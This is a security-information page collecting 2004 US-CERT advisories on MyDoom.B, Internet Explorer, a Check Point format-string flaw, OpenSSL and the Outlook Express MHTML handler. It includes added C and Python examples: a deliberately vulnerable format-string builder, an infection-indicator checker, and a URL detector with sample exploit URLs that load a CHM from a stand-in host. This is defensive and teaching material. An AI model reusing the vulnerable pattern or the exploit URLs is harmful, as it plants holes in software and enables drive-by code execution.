Security Information
This page is dedicated to security. It includes local security information as well as a number of syndicated security feeds, alerts, tools and news from major security portals. The page aims to provide a single security information access point, helping you stay current with recent security threats.
You can check the SG Security FAQ and visit the SG Security forum with any questions you might have.
SG Security Scan
The SG Security Scan is a great tool that tests a number of ports on your computer for the most common vulnerabilities.
SG Security Scanner
Vulnerable Ports
Commonly Open Ports
SG Ports - comprehensive database of known TCP/UDP ports
SG Security Articles
General Security Guide
How To Crack WEP and WPA Wireless Networks
How to Secure your Wireless Network
How to Stop Denial of Service (DoS) Attacks
IRDP Security Vulnerability in Windows 9x
Which VPN Protocol to use?
Why encrypt your online traffic with VPN?
Latest Security Advisories (US-CERT)
MyDoom.B Virus (2004.01.28)
Systems Affected Any system running Microsoft Windows (Windows 95 and newer) that is used for reading email or accessing peer-to-peer file sharing services.
Overview A new variant of the previously discovered MyDoom virus, MyDoom.B, has been identified. In addition to the common traits of email-borne viruses, this virus may prevent your computer from updating anti-virus and other software.
Description
Protect Your Systems
To protect your systems from infection by this virus, we recommend that you take the following steps. In addition to these steps, US-CERT encourages home users to review the "Home Network Security" and "Home Computer Security" documents.
- Avoid opening attachments from suspicious email messages
Emails sent out by Mydoom.B are generated randomly. The From address may also be spoofed to appear as though the message is from a different address. The subject of the message will include one of the following:
- Delivery Error
- hello
- Error
- Mail Delivery System
- Mail Transaction Failed
- Returned mail
- Server Report
- Status
- Unable to deliver the message
Not all email messages with these subject lines carry the MyDoom.B virus; some may be legitimate status messages. The message body will include one of the following:
- RANDOMIZED CHARACTERS
- test
- The message cannot be represented in 7-bit ASCII encoding and has been sent as a binary attachment.
- sendmail daemon reported: Error #804 occured during SMTP session. Partial message has been received.
- The message contains Unicode characters and has been sent as a binary attachment.
- The message contains MIME-encoded graphics and has been sent as a binary attachment.
- Mail transaction failed. Partial message is available.
The attachment will have one of the following filenames:
The filename also contains an extension (.exe, .bat, .scr, .cmd, or .pif). When the attachment is opened, the MyDoom.B virus is launched and the system is infected.
- Run and maintain an antivirus product
It is important that you use antivirus software and keep it up to date. Most antivirus software vendors frequently release updated information, tools, or virus databases to help detect and recover from virus infections. Many antivirus packages support automatic updates of virus definitions. US-CERT recommends using these automatic updates when possible. You may wish to read CERT Incident Note IN-2003-01 for more information on anti-virus software and security issues.
- Do not run programs of unknown origin
Do not download, install, or run a program unless it was written by a person or company that you trust. Email users should be wary of unexpected attachments. Be sure you know the source of an attachment before opening it. Also remember that it is not enough that the mail originated from an email address you recognize. The Melissa virus spread precisely because it originated from a familiar email address. In addition, MyDoom.B attempts to spread through file-sharing services like KaZaA. Peer-to-peer file sharing users should be particularly careful of running software sent to them by other users. This is a commonly used method among intruders attempting to build networks of distributed denial-of-service (DDoS) agents. A personal firewall will not necessarily protect your system from an email-borne virus, but a properly configured personal firewall may prevent the virus from downloading additional components or launching attacks against other systems.
How to Identify a MyDoom.B Infection
To confirm that your system has been infected with the MyDoom.B virus, perform the following steps. MyDoom.B overwrites the Windows 'hosts' file. The replacement file will probably prevent your system from accessing your antivirus vendor's web site as well as some other web sites. You can check your hosts file by following these steps:
Windows NT/2000/XP Systems
- Click on the Start menu and select Run
- In the dialog box that appears, type cmd and hit OK (a DOS window should appear)
- At the prompt in the DOS window, run: type %windir%\system32\drivers\etc\hosts
- If you see multiple lines starting with 0.0.0.0, your system is probably infected
Windows 95/98/Me Systems
- Click on the Start menu and select Run
- In the dialog box that appears, type command and hit OK (a DOS window should appear)
- At the prompt in the DOS window, run: type %windir%\hosts
- If you see multiple lines starting with 0.0.0.0, your system is probably infected
- Check for files left by the virus
MyDoom.B drops several files on an infected computer. The existence of these files is a good indication of infection. Be aware that there are legitimate Windows files with names similar to those left by the virus. Only files with these names and in these specific directories indicate an infection.
Windows NT/2000/XP Systems
- Click on the Start menu, select Search and then select For Files and Folders
- In the search box type explorer.exe
- The existence of explorer.exe in the System32 directory (typically C:\Windows\System32) is an indication of infection
- In the search box type ctfmon.dll
- The existence of ctfmon.dll in the System32 directory (typically C:\Windows\System32) is another indication of infection
Windows 95/98/Me Systems
- Click on the Start menu, select Search
- In the search box type explorer.exe
- The existence of explorer.exe in the System directory (typically C:\Windows\System) is an indication of infection
- In the search box type ctfmon.dll
- The existence of ctfmon.dll in the System directory (typically C:\Windows\System) is another indication of infection
- Examine the Windows Registry
The MyDoom.B virus also makes some changes to the Windows registry. Users who are unfamiliar with the registry should probably skip this step, because accidental changes to the registry may cause serious damage to the operating system.
Windows 95/98/Me/NT/2000/XP Systems
- At a DOS command prompt, type regedit.exe (the registry editor should appear)
- Search the Registry for the value Explorer=C:\WINDOWS\system32\explorer.exe in the key HKLM\Software\Microsoft\Windows\CurrentVersion\Run
- The existence of this value is an indication of MyDoom.B infection
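The three checks above (hosts-file black-holing, dropped files, Run-key value) expressed as code, as an added example that is not part of the US-CERT advisory. The function names are my own, and the hosts-file contents and domain names are constructed samples so the program runs anywhere; on a real machine you would feed it the actual hosts file, the directory listing and the Run key's values.

```c
/* Offline triage for the MyDoom.B indicators described in the advisory.
 * Added example: the inputs are collected separately and passed in, so the
 * checks themselves are pure string logic. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Case-insensitive string equality: Windows paths and registry value names
 * are case-insensitive, and the advisory quotes them in mixed case. */
static int str_ieq(const char *a, const char *b)
{
    while (*a && *b) {
        if (tolower((unsigned char)*a) != tolower((unsigned char)*b))
            return 0;
        a++;
        b++;
    }
    return *a == '\0' && *b == '\0';
}

/* Check 1: count hosts-file lines whose first field is exactly 0.0.0.0.
 * Blank lines and '#' comments are skipped.  The advisory's heuristic is
 * "multiple lines starting with 0.0.0.0", so more than one line is the signal. */
int count_blackhole_lines(const char *hosts_text)
{
    int count = 0;
    const char *line = hosts_text;
    while (*line) {
        const char *eol = strchr(line, '\n');
        size_t len = eol ? (size_t)(eol - line) : strlen(line);
        size_t i = 0;
        while (i < len && isspace((unsigned char)line[i]))
            i++;                                   /* tolerate indentation */
        if (len - i >= 7 && strncmp(line + i, "0.0.0.0", 7) == 0 &&
            (i + 7 == len || isspace((unsigned char)line[i + 7])))
            count++;                               /* "0.0.0.0 host" or bare */
        line = eol ? eol + 1 : line + len;
    }
    return count;
}

int hosts_file_indicates_infection(const char *hosts_text)
{
    return count_blackhole_lines(hosts_text) > 1;
}

/* Check 2: the virus's copies of explorer.exe and ctfmon.dll in the specific
 * directories the advisory names.  The legitimate explorer.exe lives in
 * C:\Windows itself, which is why only these exact paths count. */
static const char *const DROPPED_FILES[] = {
    "C:\\Windows\\System32\\explorer.exe",
    "C:\\Windows\\System32\\ctfmon.dll",
    "C:\\Windows\\System\\explorer.exe",
    "C:\\Windows\\System\\ctfmon.dll",
};

int is_mydoom_dropped_file(const char *path)
{
    size_t n = sizeof DROPPED_FILES / sizeof DROPPED_FILES[0];
    for (size_t k = 0; k < n; k++)
        if (str_ieq(path, DROPPED_FILES[k]))
            return 1;
    return 0;
}

/* Check 3: the persistence value Explorer=C:\WINDOWS\system32\explorer.exe
 * under HKLM\Software\Microsoft\Windows\CurrentVersion\Run. */
int run_value_indicates_infection(const char *name, const char *data)
{
    return str_ieq(name, "Explorer") &&
           str_ieq(data, "C:\\WINDOWS\\system32\\explorer.exe");
}

/* Constructed sample hosts files.  The domain names are placeholders, not the
 * vendor sites the virus actually blocked. */
const char *SAMPLE_INFECTED_HOSTS =
    "# hosts file (constructed sample)\n"
    "127.0.0.1       localhost\n"
    "0.0.0.0 www.av-vendor.example\n"
    "0.0.0.0 update.av-vendor.example\n"
    "0.0.0.0 liveupdate.av-vendor.example\n";

const char *SAMPLE_CLEAN_HOSTS =
    "# hosts file (constructed sample)\n"
    "127.0.0.1       localhost\n";

int main(void)
{
    printf("sample hosts: %d lines starting with 0.0.0.0 -> %s\n",
           count_blackhole_lines(SAMPLE_INFECTED_HOSTS),
           hosts_file_indicates_infection(SAMPLE_INFECTED_HOSTS)
               ? "probably infected" : "no indication");
    printf("dropped-file check: %d\n",
           is_mydoom_dropped_file("c:\\windows\\system32\\ctfmon.dll"));
    printf("run-key check: %d\n",
           run_value_indicates_infection("Explorer",
                                         "C:\\WINDOWS\\system32\\explorer.exe"));
    return 0;
}
```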
If Your System is Infected
If your system is infected, you will probably be unable to access your antivirus vendor's web site for assistance due to some changes the virus has made to your system. If this is the case, follow these steps to delete a file installed by the virus (do not do this unless you are infected; it may affect the normal operation of your system):
Windows NT/2000/XP Systems
- Click on the Start menu and select Run
- In the dialog box that appears, type del %windir%\system32\drivers\etc\hosts
Windows 95/98/Me Systems
- Click on the Start menu and select Run
- In the dialog box that appears, type del %windir%\hosts
After deleting this file, you should be able to access your antivirus vendor's web site, obtain the updates to your antivirus software and perform a full scan of your system. Some antivirus vendors may produce a Removal Tool and make it available on their web site. If your vendor provides such a tool, you may want to use it first. If you are still unsuccessful at removing the virus, contact your antivirus vendor to obtain further assistance with removal and recovery.
Additional Information
For additional technical details about this virus, please see US-CERT Technical Alert TA04-028A.
Copyright 2004 Carnegie Mellon University. Terms of use
Multiple Vulnerabilities in Microsoft Internet Explorer (2004.02.02)
Systems Affected Microsoft Windows systems running:
- Internet Explorer 5.01
- Internet Explorer 5.50
- Internet Explorer 6
Previous versions that are no longer supported may also be affected.
Overview Microsoft Internet Explorer (IE) contains multiple vulnerabilities, the most serious of which could allow attackers in any location to run programs of their choice on your computer using the same privileges as you have.
Description Microsoft's Home User Security Bulletin for February 2004 describes three vulnerabilities in Internet Explorer (IE). Note that in addition to IE, any applications that use IE to interpret HTML documents, such as email programs, may present additional ways for these vulnerabilities to be used.
These vulnerabilities have different impacts, ranging from disguising the true location of a URL to executing computer commands or code, essentially taking over control of your computer and any data on it. The attacker could exploit this vulnerability by convincing you, the victim, to access a specially crafted HTML document such as a web page or HTML email message. Your computer can be compromised simply by viewing the attacker's HTML document with Internet Explorer.
A technical description of these vulnerabilities is available from US-CERT in TA04-033A and from Microsoft in MS04-004.
Resolution
Apply a patch
Microsoft has released a home user bulletin describing how to determine what patches you will need and how to get them. Follow the procedures outlined in Microsoft's Home User Security Bulletin for February 2004.
For additional information, and to receive updates on this alert, go to http://www.us-cert.gov.
References
- US-CERT Technical Alert TA04-033A - <http://www.us-cert.gov/cas/techalerts/TA04-033A.html>
- Microsoft's Home User Security Bulletin for February 2004 - <http://www.microsoft.com/security/security_bulletins/20040202_windows.asp>
- Microsoft Security Bulletin MS04-004 - <http://www.microsoft.com/technet/security/bulletin/MS04-004.asp>
This document is available from <http://www.us-cert.gov/cas/alerts/SA04-033A.html>
HTTP Parsing Vulnerabilities in Check Point Firewall-1 (2004.02.05)
Systems Affected
- Check Point Firewall-1 NG FCS
- Check Point Firewall-1 NG FP1
- Check Point Firewall-1 NG FP2
- Check Point Firewall-1 NG FP3, HF2
- Check Point Firewall-1 NG with Application Intelligence R54
- Check Point Firewall-1 NG with Application Intelligence R55
Overview Several versions of Check Point Firewall-1 contain a vulnerability that allows remote attackers to execute arbitrary code with administrative privileges. This allows the attacker to take control of the firewall and the server it runs on.
Description The Application Intelligence (AI) component of Check Point Firewall-1 is an application proxy that scans traffic for application layer attacks once it has passed through the firewall at the network level. Earlier versions of Firewall-1 include the HTTP Security Server, which provides similar functionality. Both the AI and HTTP Security Server features contain an HTTP parsing vulnerability that is triggered by sending an invalid HTTP request through the firewall. When Firewall-1 generates an error message in response to the invalid request, a portion of the input supplied by the attacker is included in the format string for a call to sprintf(). Researchers at Internet Security Systems have determined that it is possible to exploit this format string vulnerability to execute commands on the firewall. The researchers have also determined that this vulnerability can be exploited as a heap overflow, which would allow an attacker to execute arbitrary code. In either case, the commands or code executed by the attacker would run with administrative privileges, typically "SYSTEM" or "root". For more information, please see the ISS advisory at: http://xforce.iss.net/xforce/alerts/id/162
The CERT/CC is tracking this issue as VU#790771. This reference number corresponds to CVE candidate CAN-2004-0039.
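The bug class the advisory describes, reduced to a few lines, as an added example that is not Check Point's or ISS X-Force's code. A hypothetical proxy builds an error message echoing the offending request line: the vulnerable builder splices that untrusted text into the format string itself, the hardened builder keeps the format string a literal and passes the text as a %s argument, and a small counting helper shows the review check that catches the pattern. The emit() wrapper, function names and sample request are my own.

```c
/* Format-string bug in an HTTP error path, vulnerable and hardened forms.
 * Added example, not from the advisory or the affected product. */
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Generic message-writing helper of the kind real servers have.  Whatever
 * reaches 'fmt' is interpreted by vsnprintf(), which is exactly the problem
 * when 'fmt' carries attacker-controlled text. */
static int emit(char *out, size_t out_sz, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    int n = vsnprintf(out, out_sz, fmt, ap);
    va_end(ap);
    return n;
}

/* VULNERABLE: the request line becomes part of the format string.  A request
 * containing %x, %s or %n would make vsnprintf() read or write memory it was
 * never handed.  This demo only feeds it "%%", whose expansion is well
 * defined, so the misinterpretation is visible without undefined behaviour. */
int build_error_vulnerable(char *out, size_t out_sz, const char *request_line)
{
    char fmt[512];
    snprintf(fmt, sizeof fmt, "Invalid HTTP request: %s", request_line);
    return emit(out, out_sz, fmt);          /* BUG: attacker text is the format */
}

/* HARDENED: literal format string; the untrusted text is an argument, so any
 * '%' in it is data. */
int build_error_hardened(char *out, size_t out_sz, const char *request_line)
{
    return emit(out, out_sz, "Invalid HTTP request: %s", request_line);
}

/* Review aid: count '%' conversion starts in untrusted text.  Any non-zero
 * count in data that can reach a format argument is a finding. */
int count_format_directives(const char *s)
{
    int n = 0;
    for (; *s; s++) {
        if (*s == '%') {
            n++;
            if (s[1] == '%')
                s++;                        /* "%%" is one directive */
        }
    }
    return n;
}

/* Constructed request line with doubled percent signs, the only '%' content
 * whose interpretation as a format stays well defined. */
static const char *SAMPLE_REQUEST = "GET /%%41%%41 HTTP/1.0";

int main(void)
{
    char buf[512];
    build_error_vulnerable(buf, sizeof buf, SAMPLE_REQUEST);
    printf("vulnerable: %s\n", buf);        /* each %% collapses to one % */
    build_error_hardened(buf, sizeof buf, SAMPLE_REQUEST);
    printf("hardened:   %s\n", buf);        /* request echoed verbatim */
    printf("directives in request: %d\n", count_format_directives(SAMPLE_REQUEST));
    return 0;
}
```

The vendor fix described above (changing the error return strings) addresses the same root cause: the error text must never be assembled from request bytes and then handed to a printf-family function as its format.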
Impact
This vulnerability allows remote attackers to execute arbitrary code on affected firewalls with administrative privileges, typically "SYSTEM" or "root".
Solution
Apply the patch from Check Point
Check Point has published a "Firewall-1 HTTP Security Server Update" that modifies the error return strings used when an invalid HTTP request is detected. For more information, please see the Check Point bulletin at: http://www.checkpoint.com/techsupport/alerts/security_server.html
Disable the affected components
Check Point has reported that their products are only affected by this vulnerability if the HTTP Security Servers feature is enabled. Therefore, affected sites may be able to limit their exposure to this vulnerability by disabling HTTP Security Servers or the Application Intelligence component, as appropriate.
This vulnerability was discovered and researched by Mark Dowd of ISS X-Force.
This document was written by Jeffrey P. Lanza.
This document is available from http://www.us-cert.gov/cas/techalerts/TA04-036A.html
Multiple Vulnerabilities in Microsoft Windows (2004.02.10)
Systems Affected Systems running Microsoft Windows
Overview Microsoft Windows contains multiple vulnerabilities, the most serious of which could allow attackers to take control of your computer.
Description Microsoft's updated Home User Security Bulletin for February 2004 describes more vulnerabilities in the Microsoft Windows operating system. Microsoft is tracking these issues as Security Update 828028. It is unclear at this time how many different ways your computer can be compromised using these vulnerabilities, so we recommend you apply the updates below as soon as possible. A technical description of these vulnerabilities is available from US-CERT in TA04-041A and from Microsoft in MS04-007.
Resolution
Apply a patch
Microsoft has released a home user bulletin describing how to determine what patches you will need and how to get them. Follow the procedures outlined in Microsoft's updated Home User Security Bulletin for February 2004. For additional information, and to receive updates on this alert, go to http://www.us-cert.gov/cas/alerts/SA04-041A.html
References
- US-CERT Technical Alert TA04-041A - <http://www.us-cert.gov/cas/techalerts/TA04-041A.html>
- Microsoft's Updated Home User Security Bulletin for February 2004 - <http://www.microsoft.com/security/security_bulletins/20040210_windows.asp>
- Microsoft Security Bulletin MS04-007 - <http://www.microsoft.com/technet/security/bulletin/MS04-007.asp>
- Microsoft Knowledge Base Article 828028: An ASN.1 vulnerability could allow code execution - <http://support.microsoft.com/?kbid=828028>
This document is available from <http://www.us-cert.gov/cas/alerts/SA04-041A.html>
Vulnerability in Microsoft Outlook 2002 (2004.03.10)
Systems Affected Systems running Microsoft Office XP and Outlook 2002
Overview There is a vulnerability in Outlook 2002 that could allow attackers to take control of your computer.
Description By taking advantage of the way Outlook interprets email links, an attacker may be able to gain control of your computer. A technical description of this vulnerability is available from US-CERT in TA04-070A and from Microsoft in MS04-009.
Resolution
Apply a patch
Microsoft's Office Security Update for March 2004 links to the necessary patches.
References
- US-CERT Technical Alert TA04-070A - <http://www.us-cert.gov/cas/techalerts/TA04-070A.html>
- Microsoft's Office Security Update for March 2004 - <http://www.microsoft.com/security/security_bulletins/20040309_office.asp>
- Microsoft Security Bulletin MS04-009 - <http://www.microsoft.com/technet/security/bulletin/ms04-009.mspx>
This document is available from <http://www.us-cert.gov/cas/alerts/SA04-070A.html>
Multiple Vulnerabilities in OpenSSL (2004.03.18)
Systems Affected
- Applications and systems that use the OpenSSL SSL/TLS library
Overview Several vulnerabilities in the OpenSSL SSL/TLS library could allow an unauthenticated, remote attacker to cause a denial of service.
Description OpenSSL implements the Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocols and includes a general purpose cryptographic library. SSL and TLS are commonly used to provide authentication, encryption, integrity, and non-repudiation services to network applications including HTTP, IMAP, POP3, SMTP, and LDAP. OpenSSL is widely deployed across a variety of platforms and systems. In particular, many routers and other types of networking equipment use OpenSSL. The U.K. National Infrastructure Security Co-ordination Centre (NISCC) and the OpenSSL Project have reported three vulnerabilities in the OpenSSL SSL/TLS library (libssl). Any application or system that uses this library may be affected.
VU#288574 - OpenSSL contains null-pointer assignment in do_change_cipher_spec() function
Versions of OpenSSL from 0.9.6c to 0.9.6k inclusive and 0.9.7a to 0.9.7c inclusive contain a null-pointer assignment in the do_change_cipher_spec() function. By performing a specially crafted SSL/TLS handshake, an attacker could cause OpenSSL to crash, which may result in a denial of service in the target application. (Other resources: OpenSSL Security Advisory (1.), CAN-2004-0079, NISCC/224012/OpenSSL/1)
VU#484726 - OpenSSL does not adequately validate length of Kerberos tickets during SSL/TLS handshake
Versions 0.9.7a, 0.9.7b, and 0.9.7c of OpenSSL do not adequately validate the length of Kerberos tickets (RFC 2712) during an SSL/TLS handshake. OpenSSL is not configured to use Kerberos by default. By performing a specially crafted SSL/TLS handshake with an OpenSSL system configured to use Kerberos, an attacker could cause OpenSSL to crash, which may result in a denial of service in the target application. OpenSSL 0.9.6 is not affected. (Other resources: OpenSSL Security Advisory (2.), CAN-2004-0112, NISCC/224012/OpenSSL/2)
VU#465542 - OpenSSL does not properly handle unknown message types
OpenSSL prior to version 0.9.6d does not properly handle unknown SSL/TLS message types. An attacker could cause the application using OpenSSL to enter an infinite loop, which may result in a denial of service in the target application. OpenSSL 0.9.7 is not affected. (Other resources: CAN-2004-0081, NISCC/224012/OpenSSL/3)
Impact
An unauthenticated, remote attacker could cause a denial of service in any application or system that uses a vulnerable OpenSSL SSL/TLS library.
Solution
Upgrade or apply a patch from your vendor
Upgrade to OpenSSL 0.9.6m or 0.9.7d. Alternatively, upgrade or apply a patch as specified by your vendor. Note that it is necessary to recompile any applications that are statically linked to the OpenSSL SSL/TLS library.
Appendix A. Vendor Information
Multiple vendors are affected by different combinations of these vulnerabilities. For updated information, please see the Systems Affected sections of VU#288574, VU#484726, and VU#465542.
These vulnerabilities were researched and reported by the OpenSSL Project and the U.K. National Infrastructure Security Co-ordination Centre (NISCC).
Feedback can be directed to the authors: Art Manion and Damon Morda.
Continuing Threats to Home Users (2004.03.19)
Alert (SA04-079A) Continuing Threats to Home Users
Original Release date: March 19, 2004 | Last revised: --
Overview
There are a number of pieces of malicious code spreading on the Internet through email attachments, peer-to-peer file sharing networks and known software vulnerabilities. Intruders target home users who have cable modem and DSL connections because many home users do not keep their machines up to date with security patches and workarounds, do not run current anti-virus software, and do not exercise caution when handling email attachments. Everyone should take precautions, patch vulnerabilities, and recover if you have been compromised.
Current Threats
US-CERT is currently tracking the incident activity related to several pieces of malicious code - Phatbot, W32/Beagle, W32/Netsky and W32/MyDoom.
Phatbot Trojan Horse
The Phatbot Trojan Horse is a piece of malicious code that allows a remote attacker to control a large number of systems. Phatbot attempts to propagate by exploiting vulnerabilities in the Microsoft Windows operating system for which users have not applied the available patches. If your computer is infected, a remote attacker will have access to your files and programs.
W32/Beagle Virus
The W32/Beagle virus is a mass-mailing virus that arrives as an attachment to an email message. To be infected, a user must open the attachment. There are many variants of this virus. Some may require a password which is included in the email message.
W32/Netsky Virus
The Netsky.B virus, described in IN-2004-02, is a mass-mailing virus that attempts to propagate either as an attachment to an email message or by copying itself to Windows network shares.
W32/MyDoom Virus
The MyDoom virus, described in TA04-028A, is a mass-mailing virus that attempts to propagate as an attachment to an email message.
Protective Measures
There are steps you can take to better protect your system from these attacks:
Apply Patches
Many viruses spread by exploiting known vulnerabilities in unpatched systems. It is very important for users to apply security-related patches to their operating systems and applications.
Install and Maintain Anti-Virus Software
US-CERT strongly recommends using anti-virus software. Most current anti-virus software products detect and alert the user of viruses. It is important to keep them up to date with current virus and attack signatures supplied by the software vendor. Many anti-virus packages support automatic updates of virus definitions. We recommend using these automatic updates when available.
Deploy a Firewall
US-CERT also recommends using a firewall product. In some situations, these products may be able to alert users to the fact that their machine has been compromised. Furthermore, they have the ability to block intruders from accessing backdoors over the network. However, no firewall can detect or stop all attacks, so it is important to continue to follow safe computing practices.
Follow Best Practices
The technical measures listed above do not provide a complete solution for securing a system. There are some best practices you can follow:
- Do not download, install, or run a program unless you know it was written by a person or company that you trust.
- Email users should be wary of unexpected attachments. Be sure you know the source of an attachment before opening it. Also remember that it is not enough that the mail originated from an email address you recognize. Many viruses spread precisely because they originate from a familiar email address.
- Users should also be wary of URLs in email or instant messages. URLs can link to malicious content that in some cases may be executed without user intervention. A common social engineering technique known as "phishing" uses misleading URLs to entice users to visit malicious web sites. These sites spoof legitimate web sites to solicit sensitive information such as passwords or account numbers.
- In addition, users of Internet Relay Chat (IRC), Instant Messaging (IM), and file-sharing services should be particularly careful of following links or running software sent to them by other users. These are commonly used methods among intruders attempting to build networks of distributed denial-of-service (DDoS) agents.
For additional information about securing home systems and networks, please see the references below.
Recovery
If the protective measures above, or other indicators, reveal that a system has already been compromised, more drastic steps need to be taken to recover. In general, the only way to ensure that a compromised computer is free from backdoors and intruder modifications is to re-install the operating system and install patches before connecting back to the network. Sometimes using an anti-virus software package to "clean" the system may not be enough.
References
- Before You Connect a New Computer to the Internet - http://www.us-cert.gov/reading_room/before_you_plug_in.html
- Home Network Security - http://www.us-cert.gov/reading_room/home-network-security/
- Home Computer Security - http://www.us-cert.gov/reading_room/HomeComputerSecurity/
- Understanding Firewalls - http://www.us-cert.gov/cas/tips/ST04-004.html
- Good Security Habits - http://www.us-cert.gov/cas/tips/ST04-003.html
- Choosing and Protecting Passwords - http://www.us-cert.gov/cas/tips/ST04-002.html
Authors: Brian B. King, Damon Morda
Revision History
- March 19, 2004: Initial release
Cross-Domain Vulnerability in Outlook Express MHTML Protocol Handler (2004.04.08)
Systems Affected
- Microsoft Windows systems
Overview A cross-domain vulnerability in the Outlook Express MIME Encapsulation of Aggregate HTML Documents (MHTML) protocol handler could allow an attacker to execute arbitrary code with the privileges of the user invoking the handler. The attacker may also be able to read and manipulate data on web sites in other domains or zones.
Description There is a cross-domain vulnerability in the way the Outlook Express MHTML protocol handler (mhtml:) determines the security domain of data referenced by a URL that specifies an alternate location. When the MHTML handler references an inaccessible or non-existent file, the handler can access a file from an alternate location. The MHTML handler incorrectly treats the file from the alternate location as if it were in the same domain as the unavailable file. The MHTML protocol handler is considered to be part of Outlook Express and is installed by default on all current Windows systems. The MHTML protocol handler is effectively a shared Windows component. Any program that exposes an MHTML protocol reference to the operating system will invoke the handler, typically using Internet Explorer (IE). Programs that use the WebBrowser ActiveX control or the IE HTML rendering engine (MSHTML) may be affected by this vulnerability. Internet Explorer, Outlook, and Outlook Express are all examples of such programs. US-CERT is tracking this issue as VU#323070. This reference number corresponds to CVE candidate CAN-2004-0380.
Impact
By convincing a victim to view an HTML document such as a web page or HTML email message, an attacker could access data or execute script in a different security domain than the one containing the attacker's document. By causing script to be run in the Local Machine Zone, the attacker could execute arbitrary code with the privileges of the user invoking the MHTML handler. The attacker may also be able to read or modify data in other web sites (including reading cookies or content and modifying or creating content).
Publicly available exploit code exists for this vulnerability. US-CERT has monitored incident reports that indicate that this vulnerability is being exploited. The Ibiza trojan, variants of W32/Bugbear, and BloodHound.Exploit.6 are some examples of malicious code that exploit this vulnerability. Any arbitrary payload could be delivered via this vulnerability, and different anti-virus vendors may identify malicious code with different names.
Most of the observed exploit code uses InfoTech Storage (ITS) protocol handlers and Compiled HTML Help (CHM) files to parse an HTML file in the Local Machine Zone. CHM files use the InfoTech Storage (ITS) format to store components such as HTML files, graphic files, and ActiveX objects, and Windows provides several protocol handlers that can access ITS files and individual CHM components: its:, ms-its:, ms-itss:, and mk:@MSITStore:. When referencing an inaccessible or non-existent MHTML file using the ITS and mhtml: protocols, IE can access a CHM file from an alternate location. Because of the vulnerability in the MHTML handler, IE incorrectly treats the CHM file as if it were in the same domain as the unavailable MHTML file. Using a specially crafted URL, an attacker can cause arbitrary script in a CHM file to be executed in a different domain, violating the cross-domain security model.
Any programs, including other web browsers, that use the Windows protocol handlers (URL monikers) for ITS or MHTML protocols could function as attack vectors. Also, due to the way that IE determines MIME types, HTML and CHM files may not have the expected file name extensions (.htm/.html and .chm respectively). A malicious web site or email message may contain HTML similar to the following:
ms-_its:_mhtml:_file://C:\nosuchfile.mht!_http://www.example.com//exploit._chm::exploit.html
(This URL is intentionally modified to avoid detection by anti-virus software.)
In this example, HTML and script in exploit.html will be executed in the security context of the Local Machine Zone. It is common practice for exploit.html to either contain or download an executable payload such as a backdoor, trojan horse, virus, bot, or other malicious code. Note that it is possible to encode a URL in an attempt to bypass HTTP content inspection or anti-virus software.
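As an added example (not part of the US-CERT advisory), the following Python shows how a mail gateway or proxy filter could flag URLs that chain an ITS-family handler with mhtml: and an alternate location, after first undoing the percent-encoding, case and whitespace tricks the paragraph above warns about. The handler names come from the advisory; the sample URLs, the evil.invalid hostname and the classification labels are constructed here.

```python
import re
from urllib.parse import unquote

# ITS-family protocol handlers named in the advisory (matched after lower-casing).
ITS_SCHEMES = r"(?:its|ms-its|ms-itss|mk:@msitstore)"

# Strong signature: ITS handler wrapping mhtml:, a primary location, the '!'
# alternate-location separator, then '::' selecting a component inside the CHM.
# No .chm/.html extension is required, because IE does not need one either.
CHAINED_ITS_MHTML = re.compile(rf"(?:^|[^a-z0-9-]){ITS_SCHEMES}:mhtml:[^!]+!.+?::")
# Weaker signal: any mhtml: reference that supplies an alternate location at all.
MHTML_ALTERNATE = re.compile(r"(?:^|[^a-z0-9-])mhtml:[^!]+![a-z]+://")

def normalize_url(url: str) -> str:
    """Undo nested percent-encoding, mixed case and inserted whitespace/control chars."""
    s = url
    for _ in range(5):                      # bounded: stop once decoding is stable
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    s = re.sub(r"[\s\x00-\x1f]", "", s)     # whitespace/control bytes break naive matching
    return s.lower()

def classify_url(url: str) -> str:
    """Return 'chained-its-mhtml', 'mhtml-alternate' or 'clean' for one URL."""
    s = normalize_url(url)
    if CHAINED_ITS_MHTML.search(s):
        return "chained-its-mhtml"
    if MHTML_ALTERNATE.search(s):
        return "mhtml-alternate"
    return "clean"

def scan_document(html: str) -> list:
    """Report every href/src attribute value in an HTML document that is not clean."""
    findings = []
    for m in re.finditer(r"""(?:href|src)\s*=\s*["']?([^"'\s>]+)""", html, re.I):
        label = classify_url(m.group(1))
        if label != "clean":
            findings.append((m.group(1), label))
    return findings

# Constructed samples (hostnames use the reserved .invalid TLD; nothing here is live).
SAMPLES = {
    "plain": "ms-its:mhtml:file://C:\\missing.mht!http://evil.invalid/x.chm::x.html",
    # '!' double-encoded as %2521 to slip past a single-pass decoder
    "double_encoded": "MS-ITS:mhtml:file://C:\\missing.mht%2521http://evil.invalid/x.chm::x.html",
    "mhtml_only": "mhtml:file://C:\\missing.mht!http://evil.invalid/page.mht",
    "benign": "http://www.example.com/docs/help.chm",
}
```

The weaker "mhtml-alternate" label is a review queue, not a block verdict, since legitimate mhtml: references can also name an alternate location.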
Solution
Install a patch
Install the appropriate cumulative patch for Outlook Express according to Microsoft Security Bulletin MS04-013.
Disable ITS and MHTML protocol handlers
Disabling the ITS and MHTML protocol handlers appears to prevent exploitation of this vulnerability. Delete or rename the following registry keys:
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\{ms-its,ms-itss,its,mk,mhtml}
Disabling these protocol handlers will significantly reduce the functionality of the Windows Help system and may have other unintended consequences. Plan to undo these changes after patches have been tested and installed.
Follow good Internet security practices
These recommended security practices will help to reduce exposure to attacks and mitigate the impact of cross-domain vulnerabilities. Additional recommendations can be found under Mitigating factors and Workarounds in the Vulnerability Details section of MS04-013.
Disable Active scripting and ActiveX controls
NOTE: Disabling Active scripting and ActiveX controls will not prevent the exploitation of this vulnerability.
Disabling Active scripting and ActiveX controls in the Internet and Local Machine Zones may stop certain types of attacks and will prevent exploitation of different cross-domain vulnerabilities. Disable Active scripting and ActiveX controls in any zones used to read HTML email.
Disabling Active scripting and ActiveX controls in the Local Machine Zone will prevent malicious code that requires Active scripting and ActiveX controls from running. Changing these settings may reduce the functionality of scripts, applets, Windows components, or other applications. See Microsoft Knowledge Base Article 833633 for detailed information about security settings for the Local Machine Zone. Note that Service Pack 2 for Windows XP includes these changes.
Do not follow unsolicited links
